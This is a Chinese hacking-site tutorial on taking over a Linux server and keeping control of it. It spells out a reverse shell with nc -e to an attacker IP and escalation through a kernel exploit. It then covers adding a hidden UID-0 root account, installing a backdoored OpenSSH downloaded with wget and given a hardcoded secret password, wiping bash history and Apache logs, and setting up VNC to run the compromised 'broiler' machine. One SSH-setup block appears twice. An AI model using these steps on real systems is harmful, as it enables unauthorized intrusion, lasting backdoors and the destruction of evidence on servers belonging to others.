WAP手机版 RSS订阅 加入收藏  设为首页
黑客技术
当前位置:首页 > 黑客技术

linux提权到 留linux后门 到图形化控制linux肉鸡

时间:2019/7/11 12:14:48   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:linux提权到留linux后门到图形化控制linux肉鸡(修整)第一部分:linux提权第一步:先反弹一个shell可以是php脚本也可以是nc很多linux自带的nc是阉割版的-e差数不能运行1.如果是php脚本反弹的话(有些shell自带反弹功能和上传脚本方法一样)将php脚本上传网站目录访问ip栏输入你的外网i...

linux提权到_留linux后门_到图形化控制linux肉鸡

linux提权到 留linux后门 到图形化控制linux肉鸡(修整)


第一部分   :  linux提权

第一步:先反弹一个shell  

可以是php脚本 也可以是nc 很多linux自带的nc是阉割版的 -e  差数不能运行

1.如果是php脚本反弹的话(有些shell自带反弹功能和上传脚本方法一样) 
  将php脚本上传网站目录 访问 
  ip栏输入你的外网ip   
  port输入你的端口(也可以是你映射的外网端口)
  还有的是选择你的主机类型 是win就选win 是linux就选linux
  
 目标服务器:    如:222.96.134.133
                 8080
                 勾选windows
提供一个脚本:fantan.php  下载地址:http://keio2.cccpan.com/  linux提权工具  fantan.php 3KB

       本机:    利用windows版的nc监听
                 nc -vv -l -p 11457

2.为什么还要说第二种方法,因为有时候脚本反弹不出来的时候 可以试试
  上传编译好的linux版nc
     
        本机:    利用windows版的nc监听
                   nc -vv -l -p 11457

    目标服务器     nc 222.96.134.133 8080 -e /bin/bash(没有bash就用sh)

本机监听获得一个cmdline后

第二步:上传提权exp 提权获得root

执行命令 获得一个交互式的shell
python –c ‘impotr pty;pty.spawn(“/bin/sh”);’
  
输入   id               查看自己什么用户权限
       uname -a         查看目标服务器内核版本
       cat /etc/passwd  试试查看用户

如果 uname -a 查看获知内核版本为 2.618-164的话
上传 编译好的2.618-164的exp

cd /tmp       进入tmp目录
chmod 777 exp 给exp执行权限
./exp         溢出

获得root权限

提权成功,但使用useradd userdel出现命令无法找到,这时我们只需要执行su - 命令即可

useradd -u 0  -o  -g root  -G root -d /home/keio keio
添加一个keio密码为空的root用户
passwd keio
输入新的 UNIX 密码:keio123 
重新输入新的 UNIX 密码: keio123
passwd:已成功更新密码

这时候keio的密码就为 keio123了

看一下有没有开启ssh  
netstat -tlp
telnet 127.0.0.1 22

如果没有看起的话
service sshd start
/etc/init.d/ssh start

如果没有安装的话 

2 安装SSH服务 
  sudo apt-get install openssh-server 
3 修改SSH配置文件(ssh-server配置文件位于/ etc/ssh/sshd_config) 
  a) sudo chmod 777 etc/ssh/sshd_config //设置为可读可写 
  b)获取root权限 sudo -i 
  c) 修改配置文件 vi etc/ssh/sshd_config  
    将下面几行注释行注释去掉: 
  #GSSAPIAuthentication yes 
    #GSSAPIDelegateCredentials no 
    #RSAAuthentication no 
    #Port 22 
4 重启SSH服务 
sudo /etc/init.d/ssh restart 
5 利用Putty或则WinSCP可以进行SSH登录了 


重新输入新的 UNIX 密码: keio123
passwd:已成功更新密码

这时候keio的密码就为 keio123了

看一下有没有开启ssh  
netstat -tlp
telnet 127.0.0.1 22

如果没有看起的话
service sshd start
/etc/init.d/ssh start

如果没有安装的话 

2 安装SSH服务 
  sudo apt-get install openssh-server 
3 修改SSH配置文件(ssh-server配置文件位于/ etc/ssh/sshd_config) 
  a) sudo chmod 777 etc/ssh/sshd_config //设置为可读可写 
  b)获取root权限 sudo -i 
  c) 修改配置文件 vi etc/ssh/sshd_config  
    将下面几行注释行注释去掉: 
  #GSSAPIAuthentication yes 
    #GSSAPIDelegateCredentials no 
    #RSAAuthentication no 
    #Port 22 
4 重启SSH服务 
sudo /etc/init.d/ssh restart 
5 利用Putty或则WinSCP可以进行SSH登录了 

 

 

 

第二部分:留linux后门

1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
shell-# wget http://192.168.1.188/sshbd.tgz
shell-# tar zxvf sshbd.tgz
shell-# cd openssh

4、设置ssh后门的登录密码:
vi versio.h
#define SSH_VERSION “OpenSSH_4.2″ –> you’ve to edit OpenSSH_4.2

vi includes.h
define _SECRET_PASSWD “test123″ -> edit as u wish password

5、继续安装:
shell-# ./configure –prefix=/usr –sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
shell-# /etc/init.d/sshd restart

6、登入后门 linux终端命令下:
ssh -l root 192.168.1.188
密码:test123
echo >/root/.bash_history //清空操作日志

7、清除apache日志:
export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i ‘/210.73.64.100/d’ access_log*

 

sshbd.tgz下载地址:


http://keio2.cccpan.com/        sshbd后门方法加工具.rar 881KB

 

 

第三部分:图形化控制 linux肉鸡

 

1.ubuntu下安装服务器端:

$sudo apt-get install vnc4server

2.配置服务器:

$vim ~/.vnc/xstartup

 

 

//因为VNC4Server缺省启动的WM是twm,如果希望启动gnome,需要改动<user>/.vnc/xstartup ,我的配置如下:

#!/bin/sh

# Uncomment the following two lines for normal desktop:

# unset SESSION_MANAGER

# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup 

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources 

xsetroot -solid grey 

vncconfig -iconic & 

xterm -geometry 1024x768+10+10 -ls -title "$VNCDESKTOP Desktop"& 

gnome-session & 

 

按一下esc   在按两下大写Z  保存退出

3.  // 设置vnc连接的密码            vnc4passwd   

4     .启动vnc服务:                    vncserver

 

 

5 连接窗口    先下载:http://ftp-dg.pconline.com.cn/79c881116d432f4c966f119289036af4/pub/download/200808/vnc-4_1_3-x86_win32.zip

 启动vnc viewer,输入对应地址,格式为:

IP:590窗口号     一般是1、2、3这些

 

6   杀死窗口     vncserver -kill :窗口号

 

如果connect后无法连接登陆,提示10060错误,很有可能是服务器端防火墙导致,要么关闭防火墙(linux可用"iptables -F"来临时关闭防火墙)。

 文章来源(黑客361

 

 




标签:后门 图形 控制 肉鸡 
相关评论

本类更新

本类推荐

本类排行

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923